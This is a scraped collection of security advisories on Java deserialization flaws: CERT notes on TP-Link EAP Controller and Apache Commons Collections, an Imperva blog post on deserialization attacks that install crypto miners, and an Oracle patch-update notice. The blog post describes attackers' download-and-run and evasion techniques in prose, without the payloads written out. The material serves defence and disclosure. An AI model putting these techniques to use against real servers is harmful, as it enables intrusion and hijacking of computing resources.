\n \n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420 \n \nEAP Controller for Linux bundles a vulnerable version of Apache commons-collections v3.2.1 with the software, which appears to be the root cause of the vulnerability. Therefore, EAP Controller v2.5.3 and earlier are vulnerable to CVE-2015-6420 as documented in [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \nEAP Controller v2.5.3 and earlier for Linux are affected by both vulnerabilities. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \n--- \n \n### Solution \n\nThe Omada Controller software v3.0.2 and later are not affected by this issue. Software download is available on the TP-Link [support](<https://www.tp-link.com/en/support.html>) website. If older software must be used, users can help mitigate and reduce risk by updating the vulnerable libraries; however, updating the libraries does not necessarily eliminate the vulnerability in all scenarios, as described in [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \n--- \n \n**Update Apache commons-collections** \n \nAffected users should update the system Apache commons-collections library to at least version 3.2.2 or 4.1. For details, please see [VU#576313](<https://www.kb.cert.org/vuls/id/576313>). \n \n**Update the JRE version of EAP** \n \nAffected users should also update the Java Runtime Environment (JRE) used by EAP to the latest available version. Recent versions of JRE have improved deserialization protection features. \n \n--- \n \n### Vendor Information\n\n### TP-LINK\n\nNotified: July 03, 2018 Updated: October 16, 2018 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 5.9 | E:POC/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.kb.cert.org/vuls/id/576313>\n * <https://www.tp-link.com/en/download/EAP220.html#Controller_Software>\n * <https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/rmi_security_recommendations.html>\n * <http://cwe.mitre.org/data/definitions/306.html>\n * <http://cwe.mitre.org/data/definitions/502.html>\n\n### Acknowledgements\n\nThanks to Liu Zhu of Huawei Weiran Lab for reporting this vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-5393](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5393>), [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2018-09-18 \n**Date First Published:** | 2018-09-26 \n**Date Last Updated: ** | 2018-11-08 18:58 UTC \n**Document Revision: ** | 102 \n", "modified": "2018-11-08T18:58:00", "published": "2018-09-26T00:00:00", "id": "VU:581311", "href": "https://www.kb.cert.org/vuls/id/581311", "type": "cert", "title": "TP-Link EAP Controller lacks RMI authentication and is vulnerable to deserialization attacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:48:59", "bulletinFamily": "info", "description": "### Overview \n\nThe Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. 
Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\n\n### Description \n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data - **CVE-2015-6420\n\nIn January 2015, at AppSec California 2015, researchers [Gabriel Lawrence and Chris Frohoff](<http://frohoff.github.io/appseccali-marshalling-pickles/>) described how many Java applications and libraries using Java Object Serialization may be vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Any Java library or application that utilizes this functionality incorrectly may be impacted by this vulnerability. \n \nIn November 2015, [Stephen Breen of Foxglove Security](<http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>) identified the [Apache Commons Collections](<https://commons.apache.org/proper/commons-collections/>) (ACC) Java library as being vulnerable to insecure deserialization of data; specifically, the ACC `InvokerTransformer` class may allow arbitrary code execution when used to deserialize data from untrusted sources. According to the researcher, this issue affects several large projects that utilize ACC including WebSphere, JBoss, [Jenkins](<https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>), [WebLogic](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>), and OpenNMS. Unify also reports that [OpenScape](<https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>) software is affected. In addition, [Cisco](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20>) has released an advisory for their products. 
\n \nBoth [versions 3.2.1 and 4.0](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) of the Apache Commons Collections library have been identified as being vulnerable to this deserialization issue. \n \nThe Apache Software Foundation has released a [statement](<https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>) regarding this issue, which contains advice for mitigating the issue, as well as further references and links. A [bug](<https://issues.apache.org/jira/browse/COLLECTIONS-580>) tracker entry has been filed to track progress toward a full solution. \n \nOther libraries, such as Groovy and Spring, are currently being investigated for similar flaws. Lawrence and Frohoff's presentation describes how applications and libraries written in other languages, such as Python and Ruby, may also be vulnerable to the same type of issue. It is generally up to software designers to follow best practices for security when handling serialized data, no matter the programming language or library used. \n \n--- \n \n### Impact \n\nA Java application or library with the Apache Commons Collections library in its classpath may be coerced into executing arbitrary Java functions or bytecode. \n \nWhile many applications do not actively use serialization or deserialization, they often rely on libraries that do. If a class uses deserialization on some input stream (either a file or socket), and an attacker can send malicious data down that stream, the attacker can cause the program to construct objects of any class on its classpath (whether it uses those classes or not). And some classes, such as those in the ACC, automatically execute code based on attacker-supplied deserialization input. \n \nAn application that neither uses deserialization, nor employs any libraries that use deserialization, would not be vulnerable to this problem. 
Such an application should also lack a plugin architecture, or any mechanism for loading code that might use deserialization. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a full solution to this problem, but you may consider the following: \n \n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) have been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. 
If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n### Apache Software Foundation\n\nUpdated: November 10, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco\n\nUpdated: July 18, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. 
We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### IBM Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### Jenkins\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### Oracle Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179>\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### Unify Inc\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. 
For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend that all customers apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information\n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMITRE has assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### Red Hat, Inc.\n\nUpdated: November 30, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJBoss has been reported as being affected.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * 
[http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 88 \n", "modified": "2018-08-27T17:57:00", "published": "2015-11-13T00:00:00", "id": "VU:576313", "href": 
"https://www.kb.cert.org/vuls/id/576313", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. 
The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an 
instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years, see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No 
\nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMware vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM WebSphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMware vCenter/vRealize | No \nCVE-2016-3642 | SolarWinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMQP | No | CVE-2015-4852 | Oracle WebLogic | Yes 
\nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Cognos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. We also saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body as a serialized Java object in XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen from the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using the \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. A few interesting observations can be made from examining this command:\n\n * The presence of shell and \u201cwget\u201d commands indicates that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, meaning that \u201cwget\u201d writes no output to the console, so it is harder to notice that such a request was even made. 
Once the downloaded script runs, the server is infected with crypto-mining malware trying to mine Monero digital coins (a cryptocurrency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers, using cmd.exe and PowerShell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods, one for Windows and one for Linux servers, each system with its own designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, which in this case is just a variable holding a space. 
The variable is probably used instead of a literal space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers and sends an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with crypto-mining malware by using an insecure deserialization vulnerability. However, insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time in the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. 
Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:20:50", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. 
Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<http://www.oracle.com/securityalerts>) for information about Oracle Security Advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 334 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2420273.1>).\n\nMany industry experts anticipate that exploits leveraging known flaws in modern processor designs will continue to be disclosed for the foreseeable future (i.e., \"Spectre\" variants). 
For information related to these issues, please refer to:\n\n * the January 2018 Critical Patch Update (and later) Advisories,\n * the \"Addendum to the January 2018 Critical Patch Update Advisory for Spectre (CVE-2017-5715, CVE-2017-5753) and Meltdown (CVE-2017-5754)\" ([Doc ID 2347948.1](<https://support.oracle.com/rs?type=doc&id=2347948.1>)), and\n * \"Information about processor vulnerabilities CVE-2018-3640 (\"Spectre v3a\") and CVE-2018-3639 (\"Spectre v4\")\" ([Doc ID 2399123.1](<https://support.oracle.com/rs?type=doc&id=2399123.1>)).\n\n \n", "modified": "2018-10-12T00:00:00", "published": "2018-07-17T00:00:00", "id": "ORACLE:CPUJUL2018-4258247", "href": "", "title": "CPU July 2018", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}